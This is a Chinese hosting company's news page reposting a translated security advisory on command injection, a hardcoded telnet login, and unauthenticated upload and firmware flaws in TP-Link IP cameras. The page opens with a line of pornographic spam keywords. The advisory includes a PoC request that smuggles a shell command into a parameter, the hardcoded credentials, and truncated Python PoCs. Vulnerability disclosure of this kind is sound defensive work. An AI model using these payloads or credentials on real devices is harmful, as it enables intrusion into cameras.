日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關咨詢
選擇下列產(chǎn)品馬上在線溝通
服務時間:8:30-17:00
你可能遇到了下面的問題
關閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
TP-Link網(wǎng)絡攝像機的多個漏洞詳細分析

漏洞描述:

目前創(chuàng)新互聯(lián)公司已為數(shù)千家的企業(yè)提供了網(wǎng)站建設、域名、虛擬主機網(wǎng)站托管運營、企業(yè)網(wǎng)站設計、修文網(wǎng)站維護等服務,公司將堅持客戶導向、應用為本的策略,正道將秉承"和諧、參與、激情"的文化,與客戶和合作伙伴齊心協(xié)力一起成長,共同發(fā)展。

TP-LinkTL-SC3171 IP Cameras網(wǎng)絡攝像機的版本為LM.1.6.18P12_sign5的固件上存在多個漏洞,這些漏洞允許攻擊者做如下的事情:

1:[CVE-2013-2578]通過文件 /cgi-bin/admin/servetest執(zhí)行任意命令。

2:[CVE-2013-2579]用硬編碼身份憑證的shell執(zhí)行任意命令。

3:[CVE-2013-2580]執(zhí)行未經(jīng)身份認證的遠程文件上傳。

4:[CVE-2013-2581]執(zhí)行未經(jīng)身份認證的固件升級。

攻擊路徑:

通過結(jié)合這些漏洞,多個攻擊路徑可被利用。額外的攻擊路徑也是可用的,但這里的攻擊路徑可以讓你了解攻擊者如何危及受影響的的設備。

攻擊路徑1:

(驗證:無)

1:通過[CVE-2013-2581]漏洞上傳一個已經(jīng)root的固件。

2:通過http:///cgi-bin/reboot 重啟設備。

攻擊路徑2:

(驗證:繞過)

1:通過http:///cgi-bin/hardfactorydefault將設備重置為出廠默認設置。之后,通過使用admin:admin作為有效的用戶和密碼繞過驗證。

2:通過http:///cgi-bin/reboot重啟設備。

3:通過[CVE-2013-2578]漏洞開啟Telnet服務。

4:使用用戶qmik(沒有密碼)登陸Telnet服務,并使該設備作為樞軸點。

受影響的設備和固件:

TP-Link TL-SC3130 (固件版本LM.1.6.18P12_sign5及以下)
TP-Link TL-SC3130G (固件版本LM.1.6.18P12_sign5及以下)
TP-Link TL-SC3171 (固件版本M.1.6.18P12_sign5及以下)
TP-Link TL-SC3171G (固件版本LM.1.6.18P12_sign5及以下)

其他的TP-Link網(wǎng)絡攝像機和固件版本可能也受影響。

供應商信息,解決方案和解決方法:

廠商提供的測試版修補固件版本鏈接如下:

[3] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130.zip

[4] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130G.zip

[5] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171.zip

[6] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171G.zip

最終的正式版本將公布在未來數(shù)天,請聯(lián)系TP-LINK了解更多信息。

技術細節(jié)說明和PoC:

1:servetest中的操作系統(tǒng)命令注入

[CVE-2013-2578]文件/cgi-bin/admin/servetest有幾個參數(shù)可以被用于操作系統(tǒng)命令注入,這會導致通過身份驗證的用戶可以執(zhí)行任意命令。下面的PoC啟動telnet服務:

GET
/cgi-bin/admin/servetest?cmd=smtp&ServerName=1.1.1.1;/usr/sbin/telnetd;&ServerPort=25&ServerSSL=off&RcptToAddr1=q@q&AdminAddr=q@q
HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://192.168.1.100/progress.htm
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64;
Trident/5.0)
Host: 192.168.1.100
Proxy-Connection: Keep-Alive
Cookie: VideoFmt=1
Authorization: Basic YWRtaW46YWRtaW4=
Content-Length: 2

2:telnet服務中的硬編碼身份認證

[CVE-2013-2579]受影響的系統(tǒng)包含一個不需要密碼的硬編碼登錄,這會導致遠程攻擊者使用這個內(nèi)置的telnet服務來登錄受影響設備的操作系統(tǒng),用戶和密碼:

username: qmik
password: (none)

qmik用戶被允許執(zhí)行命令su,這會導致以root權(quán)限執(zhí)行任意命令。telnet服務可以用通過[CVE-2013-2578]漏洞開啟。

3:未經(jīng)身份驗證的遠程文件上傳

[CVE-2013-2580]文件/cgi-bin/uploadfile允許未經(jīng)身份驗證的用戶進行遠程文件上傳,下面是Python PoC:

import requests
 
fileName = "lala.tmp"
f = open(fileName, "w")
f.write("lala")
f.close()
requests.post("

上傳文件(在本例中l(wèi)ala.tmp)將會被放置在/mnt/mtd目錄中。

4:未經(jīng)身份驗證的遠程固件升級

[CVE-2013-2581]文件/cgi-bin/firmwareupgrade允許未經(jīng)身份驗證的用戶執(zhí)行遠程固件升級,PythonPoC如下:

import requests
 
requests.get("
fileName = "COM_T01F001_LM.1.6.18P12_sign5_TPL.TL-SC3171.bin"
cookies={"VideoFmt":"1"}
requests.post("

引用:

[1] TP-Link TL-SC3171, http://www.tp-link.com/en/products/details/?categoryid=230&model=TL-SC3171.

[2] Security Analysis of IP video surveillance cameras, http://seclists.org/fulldisclosure/2013/Jun/84.

[3] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130.zip.

[4] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3130G.zip.

[5] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171.zip.

[6] http://www.tp-link.com/resources/software/1.6.18P12_sign6_TL-SC3171G.zip.

原文來自:http://www.coresecurity.com/advisories/multiple-vulnerabilities-tp-link-tl-sc3171-ip-cameras#other


當前標題:TP-Link網(wǎng)絡攝像機的多個漏洞詳細分析
分享地址:
http://www.dlmjj.cn/article/dhdgphp.html